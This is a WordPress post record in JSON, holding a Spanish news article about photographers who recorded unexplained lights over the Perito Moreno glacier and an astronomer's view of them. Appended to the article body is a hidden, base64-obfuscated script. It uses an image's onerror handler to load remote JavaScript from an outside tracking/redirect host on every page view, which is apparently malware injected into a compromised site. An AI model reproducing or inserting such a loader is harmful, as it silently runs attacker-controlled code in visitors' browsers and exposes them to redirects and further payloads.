{"id":5676,"date":"2022-08-19T00:29:48","date_gmt":"2022-08-19T03:29:48","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=5676"},"modified":"2025-08-13T16:14:39","modified_gmt":"2025-08-13T19:14:39","slug":"el-expediente-secreto-x-del-glaciar-perito-moreno-hacian-fotos-nocturnas-y-captaron-misteriosas-luces","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=5676","title":{"rendered":"\u00abEl expediente secreto X\u00bb del glaciar Perito Moreno: hac\u00edan fotos nocturnas y captaron misteriosas luces"},"content":{"rendered":"\n<p>\u00a0<em>Foto: Rodrigo Terr\u00e9n.<\/em><\/p>\n\n\n\n<h5 class=\"has-cyan-bluish-gray-color has-text-color has-background wp-block-heading\" style=\"background-color:#765803\"><strong>Como si fuera un caso de la famosa serie, tres fot\u00f3grafos especializados en im\u00e1genes nocturnas que filmaban un documental<\/strong>\u00a0registraron una asombrosa escena para la que a\u00fan no encuentran explicaci\u00f3n. El an\u00e1lisis de un astron\u00f3mo de la Patagonia. Mir\u00e1&#8230;<\/h5>\n\n\n\n<p><strong>Luces sobre los hielos\u00a0<\/strong>en medio de la completa oscuridad. Parece un caso de la famosa serie \u00abLos expedientes secretos X\u00bb, pero eso es lo que vieron tres fot\u00f3grafos especializados en im\u00e1genes nocturnas en el\u00a0<strong><a href=\"https:\/\/www.rionegro.com.ar\/voy-turismo\/ailin-recorrio-la-patagonia-sola-y-a-dedo-vos-tambien-podes-vivir-la-vida-que-sonas-2414886\/\" target=\"_blank\" rel=\"noreferrer noopener\">glaciar Perito Moreno<\/a><\/strong>\u00a0en\u00a0<strong>Santa Cruz<\/strong>. Filmaban un documental para el Canal Encuentro y por eso hab\u00edan obtenido un permiso especial del\u00a0<strong><a href=\"https:\/\/www.rionegro.com.ar\/voy-turismo\/paseo-entre-dos-glaciares-una-maravilla-mundial-y-casi-una-ilusion-optica-2206127\/\" target=\"_blank\" rel=\"noreferrer noopener\">Parque Nacional Los Glaciares<\/a><\/strong>\u00a0para quedarse a la noche frente a esa maravilla de la\u00a0<a href=\"https:\/\/www.rionegro.com.ar\/voy-turismo\/previaje-3-seis-paseos-de-patagonia-ideales-para-recorrer-cuando-entre-en-vigencia-2448836\/\" target=\"_blank\" rel=\"noreferrer noopener\"><strong>Patagonia<\/strong>\u00a0<\/a>que convoca a miles de visitantes, en especial durante los\u00a0<strong>desprendimientos de bloques de hielo,\u00a0<\/strong>que es exactamente la zona donde<strong>\u00a0<\/strong>advirtieron las luces. A\u00fan hoy, luego de consultar a\u00a0<strong>astr\u00f3nomos y cient\u00edficos\u00a0<\/strong>de diversas disciplinas, no tienen una explicaci\u00f3n sobre lo que observaron.\u00a0<a href=\"https:\/\/www.rionegro.com.ar\/los-refugios-de-el-bolson-iluminados-por-la-luna-y-las-estrellas-en-el-viaje-de-las-asombrosas-fotos-nocturnas-1835248\/\" target=\"_blank\" rel=\"noreferrer noopener\">Rodrigo Terr\u00e9n<\/a>\u00a0comparte aqu\u00ed el relato, la secuencia y el video de las asombrosas im\u00e1genes obtenidas el jueves 28 de abril en ese para\u00edso de\u00a0<strong>Santa Cruz<\/strong>.<\/p>\n\n\n\n<p>\u00abEst\u00e1bamos ah\u00ed tres fot\u00f3grafos en tres lugares distintos de la plataforma y una cuarta persona esper\u00e1ndonos arriba. En un momento, esto lo hablamos despu\u00e9s arriba, los cuatro vimos que se prendieron unas luces. Si bien eran tenues, era visibles, notorias en la oscuridad. Estamos acostumbrados a la fotograf\u00eda nocturna y esto no ocurre. No suele ocurrir\u00bb, comenz\u00f3 su relato el fot\u00f3grafo.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u00bfQu\u00e9 pas\u00f3 esa noche en el glaciar Perito Moreno?<\/h2>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\" \/>\n\n\n\n<p>\u00abPudimos entrar a documentar esta maravilla natural de noche, gracias a estar participando en un documental para canal Encuentro sobre el&nbsp;<strong>calentamiento global y su influencia en los hielos<\/strong>\u00ab, relat\u00f3 ayer Rodrigo desde Misiones, donde brindaba un taller sobre su especialidad.<\/p>\n\n\n\n<p>\u00ab<strong>Esa luz se prendi\u00f3 a las 22:25 hs y qued\u00f3 prendida durante m\u00e1s de diez minutos en la misma posici\u00f3n sin moverse un cent\u00edmetro<\/strong>\u00ab, afirm\u00f3.<\/p>\n\n\n\n<p>\u00abE<strong>l haz de luz se ve gracias a que se iluminan part\u00edculas en el ambiente<\/strong>, densidad en el aire como polvo o humedad. Esto nos muestra en la direcci\u00f3n que viaja o se proyecta la luz en l\u00ednea recta\u00bb, continu\u00f3.<\/p>\n\n\n\n<p>\u00ab<strong>Esta imagen tiene m\u00e1s de seis minuto<\/strong>s, es por esa raz\u00f3n que las estrellas se ven como trazas, a causa de la rotaci\u00f3n de la Tierra\u00bb, agreg\u00f3.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/www.rionegro.com.ar\/wp-content\/uploads\/2022\/08\/glaciar-05.jpg\" alt=\"\" \/><figcaption>El comienzo de la secuencia. El glaciar Perito Moren en la oscuridad de la noche. Foto: Rodrigo Terr\u00e9n.<\/figcaption><\/figure>\n\n\n\n<p>\u00abPor c\u00f3mo rotan las estrellas y la l\u00ednea que dejan es que podemos darnos cuenta que estamos encuadrando en direcci\u00f3n al ecuador celeste, al oeste. Generando estrellas rectas en el medio y a medida que se alejan del centro c\u00f3ncavas y convexas.\u00a0<strong>Este efecto se logra ver mejor a mayor tiempo de toma, ya que las estrellas son las que dibujan las l\u00edneas<\/strong>\u00ab, explic\u00f3.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u00bfQu\u00e9 dijeron los cient\u00edficos sobre esta imagen del glaciar Perito Moreno?<\/h2>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\" \/>\n\n\n\n<p>A\u00fan asombrado, Rodrigo, que ha\u00a0<a href=\"https:\/\/www.rionegro.com.ar\/voy-turismo\/descubri-los-tesoros-ocultos-de-la-patagonia-iluminada-por-las-estrellas-2256756\/\" target=\"_blank\" rel=\"noreferrer noopener\">compartido sus traves\u00edas<\/a>\u00a0con el\u00a0<strong>Voy<\/strong>, cont\u00f3 que luego de las consultas con astr\u00f3nomos y cient\u00edficos de otras disciplinas\u00a0<strong>a\u00fan no han encontrado la explicaci\u00f3n a lo que vieron<\/strong>.<\/p>\n\n\n\n<p>\u00abEs muy muy raro. Y lo dice alguien que est\u00e1 de noche en los lugares. Cuando hicimos la foto del glaciar Perito Moreno, esa parte\u00a0<strong>se ilumin\u00f3:<\/strong>\u00a0vimos puntos de luz arriba del glaciar y\u00a0<strong>haces de luz que proven\u00edan de ninguna parte<\/strong>. No sabemos a qu\u00e9 puede responder este fen\u00f3meno que tambi\u00e9n se ve\u00eda a simple vista. A\u00fan no tiene explicaci\u00f3n. Ni para nosotros que vivimos haciendo fotos nocturnas de naturaleza y trabajamos con la luz que es nuestro pincel, ni para los cient\u00edficos que han visto las fotos y el video\u00bb, se\u00f1ala Rodrigo.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/www.rionegro.com.ar\/wp-content\/uploads\/2022\/08\/claciar-03.jpg\" alt=\"\" \/><figcaption>En esta segunda, con un minuto y medio de exposici\u00f3n, se observan n\u00edtidas las luces a la derecha. Foto: Rodrigo Terr\u00e9n<\/figcaption><\/figure>\n\n\n\n<p>Como si fuera un cap\u00edtulo de la famosa serie&nbsp;<em>Los expedientes secretos X<\/em>, el fot\u00f3grafo adem\u00e1s de compartir las im\u00e1genes a especialistas tambi\u00e9n las envi\u00f3 a<strong>&nbsp;los grupos de cient\u00edficos que se lo solicitaron para investigarlas.<\/strong>&nbsp;\u00abPero hasta ahora no hemos recibido ninguna explicaci\u00f3n sobre este fen\u00f3meno\u00bb:<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\" \/>\n\n\n\n<h2 class=\"wp-block-heading\">Las luces aparecieron en la zona de los desprendimiento del glaciar<\/h2>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\" \/>\n\n\n\n<p>Todo ocurri\u00f3 en la zona derecha del glaciar vi\u00e9ndolo de frente, donde se producen los desprendimientos de grandes bloques de hielo, relat\u00f3 Rodrigo:&nbsp;<strong>\u00abNo hay ninguna actividad en esa zona<\/strong>. Simplemente las luces se prendieron y se apagaron. No hay una explicaci\u00f3n l\u00f3gica y racional, hasta ahora\u00bb.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/www.rionegro.com.ar\/wp-content\/uploads\/2022\/08\/glaciar-04.jpg\" alt=\"\" \/><figcaption>Aqu\u00ed, ya con seis minutos de exposici\u00f3n; se advierten los haces de luces. Foto: Rodrigo Terr\u00e9n<\/figcaption><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">La visi\u00f3n de un astr\u00f3nomo de la Patagonia<\/h2>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\" \/>\n\n\n\n<p>Desde Viedma, el astron\u00f3mo Facundo Albacete analiz\u00f3 las im\u00e1genes al ser consultado por el Voy. Despu\u00e9s de la sorpresa inicial, lo primero que advirti\u00f3 es que l<strong>os haces de luces no impactan sobre el glaciar sino que su trayectoria es desde el hielo hacia arriba&nbsp;<\/strong>al notar la dispersi\u00f3n a medida que se alejan de la superficie de hielo.<\/p>\n\n\n\n<p>\u00abAl ser esa luz que se ve producida digamos de alguna manera en el hielo, porque aparte&nbsp;<strong>esa noche no hab\u00eda Luna<\/strong>, era del 3 %, eso est\u00e1 chequeado en un programa para la fecha de observaci\u00f3n, as\u00ed que no hay Luna, no hay fuente lum\u00ednica que los fot\u00f3grafos hayan percibido arriba y la luz dispersa hacia arriba, quiere decir que viene del hielo. Adem\u00e1s, a la distancia que est\u00e1 eso, la mase que se ilumina es grand\u00edsima, alt\u00edsima con lo cual eso&nbsp;<strong>no es una linternita ni un reflector. Eso son miles y miles de l\u00famenes. Una cantidad de luz impresionante.<\/strong>&nbsp;Y est\u00e1 dispersa en distintas partes. Esa cantidad de luz no la puede producir un artefacto manual de una persona\u00bb, explic\u00f3 el astr\u00f3nomo.<\/p>\n\n\n\n<p><br>Al considerar los mecanismos f\u00edsicos que podr\u00edan generar luces como se ven en las fotos, el astr\u00f3nomo en una primera mirada no hall\u00f3 ninguno que las explique por completo, en especial por el dato m\u00e1s sorpendente: que<strong>&nbsp;hayan permanecido est\u00e1ticas durante los seis minutos de exposici\u00f3n<\/strong>&nbsp;de la \u00faltima imagen tomada por Rodrigo Terr\u00e9n. \u201cEso es supercurioso\u201d, dijo.<\/p>\n\n\n\n<p><br>Tamb\u00e9n le llam\u00f3 la atenci\u00f3n que la direcci\u00f3n en la que salen los haces coincide con la trayectoria de las estrellas que se ven de fondo. Por \u00faltimo, advirti\u00f3 que en la foto m\u00e1s oscura, es decir la que tiene menos tiempo de exposici\u00f3n, se nota una luz en el centro del glaciar. \u201cEsto, como todo, es muy interesante\u201d, se\u00f1al\u00f3.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><a href=\"https:\/\/www.rionegro.com.ar\/voy-turismo\/misterio-en-el-glaciar-perito-moreno-detectan-extranas-luces-sobre-el-hielo-en-la-oscuridad-de-la-noche-2448876\/\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/08\/Captura-web_19-8-2022_0236_www.rionegro.com_.ar_.jpeg\" alt=\"\" class=\"wp-image-5677\" width=\"361\" height=\"63\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/08\/Captura-web_19-8-2022_0236_www.rionegro.com_.ar_.jpeg 498w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/08\/Captura-web_19-8-2022_0236_www.rionegro.com_.ar_-300x52.jpeg 300w\" sizes=\"(max-width: 361px) 100vw, 361px\" \/><\/a><figcaption>Fuente de laInformacion:<\/figcaption><\/figure>\n\n\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>\u00a0Foto: Rodrigo Terr\u00e9n. Como si fuera un caso de la famosa serie, tres fot\u00f3grafos especializados en im\u00e1genes nocturnas que filmaban un documental\u00a0registraron una asombrosa escena para la que a\u00fan no encuentran explicaci\u00f3n. El an\u00e1lisis de un astron\u00f3mo de la Patagonia. Mir\u00e1&#8230; Luces sobre los hielos\u00a0en medio de la completa oscuridad. Parece un caso de la [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":5678,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[31,23,21],"tags":[],"class_list":["post-5676","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-colaboradores","category-entrevistas","category-patagonia"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5676","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5676"}],"version-history":[{"count":2,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5676\/revisions"}],"predecessor-version":[{"id":10602,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5676\/revisions\/10602"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/5678"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5676"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5676"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5676"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}